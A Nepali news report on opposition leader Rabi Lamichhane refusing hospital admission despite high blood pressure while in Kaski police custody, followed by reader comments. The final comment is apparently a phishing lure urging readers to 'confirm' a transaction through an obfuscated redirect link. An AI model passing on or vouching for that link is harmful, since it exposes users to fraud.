कास्की । कास्की प्रहरी हिरासतमा रहेका राष्ट्रिय स्वतन्त्र पार्टीका सभापति रवि लामिछाने स्वास्थ्यमा सुधार नआएपनि अस्पताल बस्न अस्वीकार गरेका छन् ।
वीरगन्जमा बयान सकेर आज पोखरा ल्याइएका लामिछानेलाई कास्की प्रहरीले स्वास्थ्य परीक्षणका लागि फिस्टेल अस्पताल पुर्याएको थियो । अस्पतालका फिजिसियन डा.बसन्त ताम्राकारका अनुसार लामिछानेको रक्तचाप उच्च अवस्थामा छ । आज भएको स्वास्थ्य परीक्षणकाक्रममा लामिछानेको सिस्टोलिक (माथि) १७० र डायस्टोलिक(तल) ११० रहेको पाइएको ताम्राकारले बताए । साथै लामिछानेको मुटुको चालमा समेत समस्या देखिएको छ ।लामिछानेको रक्तचाप तथा इको परिक्षण गरिएको अस्पतालले जनाएको छ ।
'लामिछाने जीको स्वास्थ्य अवस्था बिग्रिएको छ, रक्तचाप तथा मुटुको चालमा पनि अस्वभाविक देखिएको छ,' डा ताम्राकारले भने 'भर्ना गरेरै थप परिक्षण तथा उपचार गर्नुपर्ने अवस्था छ' । चिकित्सकले अस्पतालमा भर्ना भएर उपचार गर्न भनेपनि लामिछानेले अस्वीकार गरेको बताए । 'यो अवस्थाका बिरामीलाई भर्ना गरि उपचार गर्नुपर्ने हो तर लामिछानेले आफू हिरासतमै औषधी सेवन गरेर आराम गर्ने बताउनु भयो', डा.ताम्राकारले भने ।
लामिछानेलाई अस्पताल बस्न उनका परिवार तथा सचिवालयले समेत आग्रह गरेकाे थिए । तर लामिछानेले 'आफ्नो मुटु दरो छ' भन्दै अस्पतालमा भर्ना हुन अस्वीकार गरेको स्वकीय सचिव अविनाश आचार्यले बताए । लामिछाने केही औषधी लिएर अहिले कास्की प्रहरी हिरासतमा फर्किएका छन् ।
रवि लामिछानेको स्वास्थ्यमा भएन सुधार, आज पनि रक्तचाप १७०/११०
-
Gyan Bh Jumli 15 days agoAru vanda farak hununxa
-
Kaushal Yadav 15 days agoनेपालमा कुनै एउटा सच्चा नेता तथा सुपुत्र हुन् भन्ने त्यो रबि दाइ हो। भगवान् ले सदैव रक्षा गरुन्। परिवर्तन सम्भव छ। २०८४ सालको चुनाव ले देखाउने छ।
-
PRKASH SINGH 15 days ago9811965453
-
Sudip dhimal 15 days agoरबि लामिछाने लाई अस्पताल भर्ना गर्नु पर्छ
-
Chhatra Dangi 15 days agoहिम्मत हार्नु हुदैन रबि दाजु,चोर जाली हरु जस्तो अस्पताल बस्ने अरुलाई पाठ सिकाउनु पर्छ,भगवानको कृपाले केही हुदैन,,,सिग्र स्वास्थय लाभको कामना🙏
-
Dinedh 15 days agoओलि देउबा प्रचण्डे नसक्की देश नबन्ने भो जति खाए नि लाद्रो नभरिनी एमाले काङ्रेस माओबादी रेछ । काम गर्न खोज्ने युवालाई मार्नै पर्ने हो ?
-
LB Bikram Thakuri 15 days agoBhagawan le sadhai rakchya garun Rabi daiko Get well soon 🙏🏿🙏🏿 Rabi Daju xittai Nirdosh bhayara riha Bhayako herna paau
-
Ajit khana 15 days agoYattiko aat bhako manxa chai chainxa hai ,,🐅
-
Santosh Pandit 15 days ago
-
Dron Neupane 14 days agoस्वस्थ भएर जिउनु त पर्यो उपचार त राम्रै संग गर्नु पर्यो त !
-
Dron Neupane 14 days agoस्वस्थ भएर जिउनु त पर्यो उपचार त राम्रै संग गर्नु पर्यो त !
-
🔑 Sending a transaction from us. Confirm =>> out.carrotquest-mail.io/r?hash=YXBwPTY0MDcyJmNvbnZlcnNhdGlvbj0xNzkzOTE4MTAyMDE5MjQ2NTkyJmFjdGlvbj1jbGlja2VkJnVybD1odHRwcyUzQSUyRiUyRnJlZGxpbmtiaXRzLnRvcCUyRmdvJTJGeTJiNDAzJTJGMjNiNCZyYWlzZV9vbl9lcnJvcj1GYWxzZSZ 13 days agoz9bsg6